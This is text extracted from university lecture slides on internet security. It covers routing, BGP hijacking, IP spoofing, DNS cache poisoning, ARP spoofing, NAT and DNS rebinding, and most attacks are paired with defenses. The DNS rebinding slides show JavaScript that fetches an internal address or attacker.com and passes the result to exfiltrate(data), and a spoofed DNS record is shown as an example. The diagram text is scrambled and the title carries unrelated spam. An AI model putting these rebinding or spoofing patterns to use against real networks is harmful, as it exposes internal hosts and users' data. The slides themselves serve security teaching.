CS计算机代考程序代写 Java javascript dns Introduction to the Internet

Introduction to the Internet
ECEN 5032: Intro to Computer Security October 5, 2016

Internet: History
 ARPANET  “log”

Packet-switched network
 Send chunks of data
 Source address (from)
 Destination address (to)
To: B From: A

Early packet-switched networks

“Best-effort”

Goal of the Internet
 Get packet from A to B  Quickly?
 Reliably?
 Securely?
F
H
M
A
P J
B R
G

Get packet to B!
BF
H
M
A
P J
B R
G

From H’s perspective
B
?
?
H
M
A
P J

Naïve approach: send to all
F
P J
B
B
H
M
B R
A
G

Naïve approach: send to all
B
F
H
M
G
BB
B
B R
A
P J

Naïve approach: send to all
B
F
P J
BB B
B
H
M
B R
B
A
G
B
B

Ahhhhh!! (BBBBB BBB BBBB…)
BB BB
BB B
F
B B
H
M
A
B
B
B
B R
P J
G
BB B
B
B

Back to H’s perspective
B
H
M
?
 Send to all will not scale!
?
A
P J

Better approach:
send to next closest node
F
P J
B
H
M
B R
A
G

Better approach:
send to next closest node
F
H
M
G
B
B R
A
P J

Better approach:
send to next closest node
H
M
F
P J
B
A
G
B R

Better approach:
send to next closest node
F
H
M
A
P
R
B
B
J
G

Who is closer?
 Enter:RoutingTables
 Each node has a unique routing table
 Tells a node who next to forward to (next hop), given a destination

H’s Routing table
Destination
Next Hop
A

H
J

M

A
J
F,P,R
M
G
J
B
M
M
F
P
G
B R

Classless Inter-Domain Routing (CIDR)
 Blocks of IP addresses
 Prefix
▪ 128.138.113.0 = 0x80 8a 71 00 ▪ 32-bit IPv4 address
 Prefix size (number of significant bits)
▪ /24 = 0xFF FF FF 00 (24 bits of 1)
▪ Netmask: 255.255.255.0 (/24) 255.255.0.0 (/16)
 E.g:
 10.0.2.0/24 = 10.0.2.*
 10.0.2.0/25 = 10.0.2.0 – 10.0.2.127  10.0.2.0/26 = 10.0.2.0 – 10.0.2.63

Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink 128.138.97.128/25 dev eno1 proto kernel scope link
# (old/deprecated way)
$ route -n
Kernel IP routing table
Destination Gateway
0.0.0.0 128.138.97.129
128.138.97.128 0.0.0.0
If packet to 128.138.97.128/25, send locally (direct to MAC addr) Else, forward packet to MAC of default gateway (128.138.97.129)
src 128.138.97.189
Genmask
0.0.0.0
255.255.255.128 U eno1
Flags Iface
UG eno1

Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink 128.138.97.128/25 dev eno1 proto kernel scope link
src 128.138.97.189
If packet to 128.138.97.128/25, send locally (direct to MAC addr)
Else, forward packet to MAC of default gateway (128.138.97.129)
128.138.97.129
MAC: aa:aa:..:aa
128.138.97.189
MAC: bb:bb:bb:bb:bb:bb
Internet
128.138.97.200
MAC: cc:cc:cc:cc:cc:cc

What do packets look like?

HTTP TLS
TCP
IP
MAC
Physical
HTML, Videos, Memes, cat pictures, … Application Layer
Transport Layer (e.g. TCP, UDP, SCTP) Network layer (e.g. IPv4, IPv6)
e.g. Ethernet (MAC addresses), ATM, …
e.g. WiFi, Ethernet cable, phone line, fiber, …

What does a packet look like?
d404cd867432f859718e99c30800450000bf74 f7400040067e9bc0a8000f12ea7305d7e60050 266cc951942d78aa801801f6f59c0000010108 0afdfc5bfa296efff1474554202f2048545450 2f312e310d0a557365722d4167656e743a2057 6765742f312e31392e3420286c696e75782d67 6e75290d0a4163636570743a202a2f2a0d0a41 63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a

What does a packet look like?
d404cd867432f859718e99c30800
Ethernet
450000bf74
f7400040067e9bc0a8000f12ea7305
IP
d7e60050
266cc951942d78aa801801f6f59c0000010108
TCP
0afdfc5bfa296efff1
474554202f2048545450
2f312e310d0a557365722d4167656e743a2057
6765742f312e31392e3420286c696e75782d67
6e75290d0a4163636570743a202a2f2a0d0a41
63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a
HTTP

What do packets look like?

Problem solved!
 Real routing tables
 Destinations are CIDR blocks
▪ E.g. 141.212.0.0/16
 Next hop (gateway) is a single IP on a physically
connected network
▪ May belong to another Autonomous System (AS), E.g.: ▪ AS 237 (Merit)
▪ AS 104 (CU Boulder)
▪ AS 7018 (AT&T)
▪ AS 14041 (UCAR / FRGP)

…or is it?
 How do we get these magical routing tables?  Enter:BorderGatewayProtocol(BGP)
 179/TCP connection between two routers
 Provide reachability information via UPDATE messages

BGP UPDATE
F
H
M
G
A
P J
R
B
Hey everyone! I can reach B! AS PATH: R

BGP UPDATE
F
I can reach B! AS PATH: P R
H
M
A
P J
B R
G

BGP UPDATE
F
AS PATH:
F P R
I can reach B!
H
M
P J
I can reach B! AS PATH: G P R
A
G
B R

BGP UPDATE
F
H
M
AS PATH:
P
G
F P R
I can reach B! AS PATH: P R
I can reach B!
I can reach B! AS PATH: G P R

BGP UPDATE
I can reach B!
AS PATH:
F
M P R
H
M
A
P J
I can reach B! AS PATH: J G P R
B R
G

BGP UPDATE
I can reach B!
AS PATH:
H M P R
F
H
M
A
P J
B R
G

BGP UPDATE
HM PR
F PR M PR F
H
M
PR
B RR
G P R
A
P J
G
JG P R

BGP: Security?
F
H
M
A
P J
E
B R
G
I can reach B! AS PATH: E

BGP: Security?
F PR M PR F
H
M
HJ E
A
E
E
P J
PR
B RR
G
J E
GJ E

BGP “hijacks” of 1.0.0.0/8
1/8 Allocated

BGP: prefix hijacking
 It gets worse:
 Real routes are blocks (e.g. /16 network block)  Choose shortest most specific AS PATH
Destination
Next Hop
AS PATH
128.138.0.0/16
192.12.80.70
104 (CU Boulder)
128.138.0.0/17
198.109.93.50
600 12145 (CSU)
128.138.128.0/17
198.109.93.50
600 12145 (CSU)

YouTube Hijack (Feb 2008)
 AS36561 (YouTube): 208.65.152.0/22

YouTube Hijack (Feb 2008)
 AS36561 (YouTube): 208.65.152.0/22  AS17557 (Pakistan Telecom): 208.65.153.0/24

YouTube Hijack (Feb 2008)
 AS36561 (YouTube): 208.65.152.0/22  AS17557 (Pakistan Telecom): 208.65.153.0/24  AS36561 (YouTube): 208.65.153.0/24

YouTube Hijack (Feb 2008)
    
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24
AS36561 (YouTube): AS36561 (YouTube):
AS36561 (YouTube):
208.65.153.0/24 208.65.153.128/25 208.65.153.0/25

YouTube Hijack (Feb 2008)
    
AS36561 (YouTube): 208.65.152.0/22 AS17557 (Pakistan Telecom): 208.65.153.0/24
AS36561 (YouTube): AS36561 (YouTube):
AS36561 (YouTube):
208.65.153.0/24 208.65.153.128/25 208.65.153.0/25
 http://youtu.be/IzLPKuAOe50

BGP hijack defenses
 Not everyone gets to BGP
 Multiple vantage points help detect hijacks
 Human response vs Computers
 S-BGP
 soBGP
 Pretty Secure BGP
 Pretty Good BGP
 But misconfigurations/DoS still common

IP spoofing
 Who said we had to be honest about the source address?

IP spoofing: defenses
 Ingress Filtering
 Reverse Path Forwarding (detect lies with a FIB)
 TCP
 Each host uses sequence numbers (32-bits) to prevent blind spoofing

IP spoofing around defenses
 Ingress Filtering not at all ISPs
 TCP not perfect or the only protocol…
 Backscatter
 TCP windows?  UDP?

UDP!
 What uses UDP?
 Networked Games  VoIP (RTP)
 DNS

DNS
 1.2.3.4 -> 4.2.2.1
What’s the IP for www.hobocomp.com
(TXID: 45121)
 4.2.2.1 -> 1.2.3.4
www.hobocomp.com IN A 68.40.59.167
(TXID: 45121) TTL 1789

DNS
 1.2.3.4 -> 4.2.2.1
 IP for ecen4133.org?
 4.2.2.1 -> k.root-servers.net ;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
org. 172800 IN NS a0.org.afilias-nst.info. org. 172800 IN NS a2.org.afilias-nst.info.
;; ADDITIONAL SECTION:
a0.org.afilias-nst.info. 172800 IN A 199.19.56.1 a2.org.afilias-nst.info. 172800 IN A 199.249.112.1

DNS
 4.2.2.1 -> 199.19.56.1  IP for ecen4133.org?
;; QUESTION SECTION: ;ecen4133.org.
;; AUTHORITY SECTION: ecen4133.org. 86400 IN ecen4133.org. 86400 IN
;; ADDITIONAL SECTION: ns8.zoneedit.com. 172800 IN ns16.zoneedit.com. 172800 IN
IN A
NS dns1.registrar-servers.com NS dns2.registrar-servers.com
A 75.125.10.187 A 69.64.68.41
. .

DNS
 4.2.2.1 -> dns1.registrar-servers.com  IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org.
;; ANSWER SECTION: ecen4133.org. 300 IN
;; AUTHORITY SECTION: ecen4133.org. 1800 IN ecen4133.org. 1800 IN
IN A
A 18.234.115.5
NS dns1.registrar-servers. NS dns2.registrar-servers.
c c

DNS
 4.2.2.1 -> 1.2.3.4
 I found your answer (finally!)
▪ ecen4133.org. IN A 18.234.115.5

Bad guy:
 Spoof responses from 4.2.2.1 (or higher)
 Has to guess the TXID… ▪ Only 65536 possible values
▪ Bandwidth helps
▪ Can play this game more than once
▪ Own 783.google.com? Great, delegate to www.google.com, which, oh, by the way, is 6.6.6.6
▪ “4.2.2.1” -> 1.2.3.4 (TXID lucky_guess) 783.google.com IN CNAME www.google.com www.google.com IN A 6.6.6.6

DNS poisoning defenses
 Randomize source port on lookups
 Lookup random case: “gOogLE.cOM”  DNSSEC
 Have records be signed by higher-level DNS

Network switches vs hubs
 Hubs broadcast received packets to all other links
 Switches only send to links that have sent from that Layer-2 address
 E.g. If you see a packet from A on port 1, send all packets to A to port 1.
 Attacks?

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
Who is 10.0.0.5?
(I’m 10.0.0.8 (cc:cc:cc:cc:cc:cc))
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.5 aa:aa:aa:aa:aa:aa
10.0.0.8
cc:cc:cc:cc:cc:cc

Address Resolution Protocol (ARP)
Internet Gateway
10.0.0.1 ee:ee:ee:ee:ee:ee
10.0.0.5
aa:aa:aa:aa:aa:aa
10.0.0.1
cc:cc:cc:cc:cc:cc
Cc:cc:cc:cc:cc:cc
10.0.0.8 cc:cc:cc:cc:cc:cc
10.0.0.8
10.0.0.5 aa:aa:aa:aa:aa:aa

ARP spoofing defenses?

ARP spoofing defenses
 Hard-code/configure switch with specific MAC addresses on specific ports
 Separate untrusted hosts onto a separate subnet/VLAN
 Clients can track changes in IP <-> MAC mapping  E.g. ArpON, ArpWatch
 Cryptographically sign updates?
 Hard to do without a trusted third-party that can vouch for identities (which remote CA-like entities can’t do)
 Short answer: don’t trust your local subnet!  Use VPNs/end-to-end encryption when possible

Network Address Translation (NAT)
 Running out of IPv4 addresses (only 2^32 possible!)
 Need a way to share public IPs with lots of hosts
 RFC1918: Private IP addresses  10.0.0.0/8
 192.168.0.0/16
 172.16.0.0/12

Network Address Translation (NAT)
 1. Hand out Private (RFC1918) addresses to local devices
 2. Intercept outgoing connections (at the gateway), and replace private IP with the shared public address
 3. Keep a map of outgoing source port/destination; return traffic must be translated back (to send to the original private IP)
 Incoming connections?

DNS rebinding
 Attacker wants to access hosts internal to a NAT (e.g. 10.0.0.1)
 Can get victim on the NAT to visit attacker’s website (attacker.com, at 6.6.6.6)
 Attacker tries to run Javascript: What happens?
$.get(‘http://10.0.0.1/’,
function(data) { exfiltrate(data); });

DNS rebinding
 Attacker instead runs What happens?
$.get(‘http://attacker.com/’,
function(data) { exfiltrate(data); });

DNS rebinding
 Attacker instead runs
What happens?
 Browser checks to see if attacker.com’s DNS entry has
expired
 If it has, make another DNS query for attacker.com
 On this second query, attacker.com returns 10.0.0.1  Browser makes HTTP request to 10.0.0.1,
defeating the Same-Origin Policy!  Defenses?
$.get(‘http://attacker.com/’,
function(data) { exfiltrate(data); });